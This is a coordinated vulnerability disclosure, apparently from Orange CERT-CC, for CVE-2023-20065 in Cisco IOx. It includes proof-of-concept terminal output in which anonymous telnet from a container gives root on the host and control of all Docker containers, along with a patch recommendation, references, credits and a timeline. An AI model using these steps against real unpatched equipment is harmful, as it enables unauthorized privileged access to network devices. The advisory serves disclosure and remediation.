Superuser access via anonymous telnet access. Superuser access on the CAF IOx and manage all docker containers.
It is possible from an administrator access on docker container to have a privileged access on the CAF IOX equipment through a telnet access as an anonymous user.
# arp -a
? (<SWITCH_IP>) at 24:yy:yy:yy:yy:fa [ether] on eth0 // switch IP
? (<CAF_IP>) at 02:xx:xx:xx:xx:e3 [ether] on sss // CAF IOX IP
# ip addr
[...]
54: sss@if55: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 52:aa:aa:aa:aa:00 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet <IP_DOCKER_CONTAINER_sss_network>/27 brd 192.168.10.95 scope global sss
[...]
56: eth0@if57: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
qlen 1000
link/ether 52:54:dd:1a:13:c0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet <IP_DOCKER_CONTAINER_eth0_network>/29 scope global eth0
[...]
# telnet <CAF_IP>
bc.Trying <CAF_IP>...
Connected to <CAF_IP>.
Escape character is '^]'.
Linux 5.4.158 (CF6-Stack1_1_RP_0) (7)
2022/08/22 12:40:28 : <anon> // here anonymous connection
[CF6-Stack1_1_RP_0:~]$ whoami
root
[CF6-Stack1_1_RP_0:~]$ docker ps
CONTAINER ID IMAGE COMMAND STATUS PORTS NAMES CREATED
c4793cf47852 thousandeyes/enterprise-agent:4.1.0 "/sbin/my_pre_init" Up 3 weeks <docker_container>_Agent 3 weeks ago
f154475a57d5 cisco_sleep:latest "/sleep.sh" Up 3 weeks <docker_container>_Agent_sleep 3 weeks ago
Overview
Superuser access via anonymous telnet access. Superuser access on the CAF IOx and manage all docker containers.
Details
It is possible from an administrator access on docker container to have a privileged access on the CAF IOX equipment through a telnet access as an anonymous user.
Proof of Concept
From docker container (after docker container escape step):
Solution
Security patch
Upgrade to patched Cisco IOS release, as described in Cisco Security Advisory
References
https://nvd.nist.gov/vuln/detail/CVE-2023-20065
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk
Credits
Orange CERT-CC
Frederic PREVOST at Orange group
Naima SADOUN at Orange group
Mickael DORIGNY at Orange group
Benoit MALABOEUF at Orange group
Timeline
Date reported: September 15, 2022
Date fixed: March 22, 2023